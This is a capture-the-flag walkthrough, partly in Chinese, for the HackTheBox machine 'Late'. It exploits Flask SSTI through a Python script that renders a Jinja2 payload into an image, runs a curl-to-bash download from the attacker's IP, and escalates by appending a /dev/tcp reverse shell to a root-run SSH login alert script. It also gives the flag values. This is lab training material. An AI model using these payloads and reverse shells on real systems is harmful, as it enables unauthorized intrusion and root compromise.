[Meachines] [Easy] Late Image to text(Flask)SSTI+lsattr+ssh登入预警权限提升

Information Gathering

IP Address	Opening Ports
10.10.11.156	TCP:22,80

$ ip='10.10.11.156'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 025e290ea3af4e729da4fe0dcb5d8307 (RSA)
|   256 41e1fe03a5c797c4d51677f3410ce9fb (ECDSA)
|_  256 28394698171e461a1ea1ab3b9a577048 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Image to text with Flask SSTI

# echo '10.10.11.156 late.htb images.late.htb'>>/etc/hosts

http://images.late.htb/

https://onlinetexttools.com/convert-text-to-image

上传SSTI载荷

from PIL import Image, ImageDraw, ImageFont
import sys

def main():
    if len(sys.argv) < 2:
        print('Usage: {} <cmd>'.format(sys.argv[0]))
        exit()
    
    img = Image.new('RGB', (2000, 100), color=(0, 0, 0))
    draw = ImageDraw.Draw(img)
    
    try:
        myFont = ImageFont.truetype('LiberationMono-Regular.ttf', 15)
    except IOError:
        print("Font file not found. Using default font.")
        myFont = ImageFont.load_default()
    
    payload = """{{{{
self._TemplateReference__context.namespace.__init__.__globals__.os.popen(
\"{cmd}\").read()
}}}}""".format(cmd=sys.argv[1])
    
    draw.text((0, 3), payload, fill=(255, 255, 255), font=myFont)
    img.save('payload.png')
    print("Payload image saved as 'payload.png'")

if __name__ == '__main__':
    main()

$ python3 exp.py 'curl http://10.10.16.33/reverse.sh|bash'

User.txt

97957f521c7524ab8c7d89ab95ef262f

Privilege Escalation:lsattr && ssh login alert

/usr/local/sbin/ssh-alert.sh

这个 ssh-alert.sh 脚本是一个 SSH 登录警报，用于检测 SSH 登录事件并向管理员发送邮件通知。它通常与 PAM (Pluggable Authentication Modules) 结合使用，以便在每次成功的 SSH 登录时自动触发。

查看 ssh-alert.sh 文件的扩展属性

$ lsattr /usr/local/sbin/ssh-alert.sh

只能追加：该文件只能在已有内容的基础上追加

$ echo '/bin/sh -i >& /dev/tcp/10.10.16.33/443 0>&1'>>/usr/local/sbin/ssh-alert.sh

$ ssh svc_acc@10.10.11.156 -i ./id_rsa

Root.txt

3ab5d906b2aa753ace8296d4f46c67f6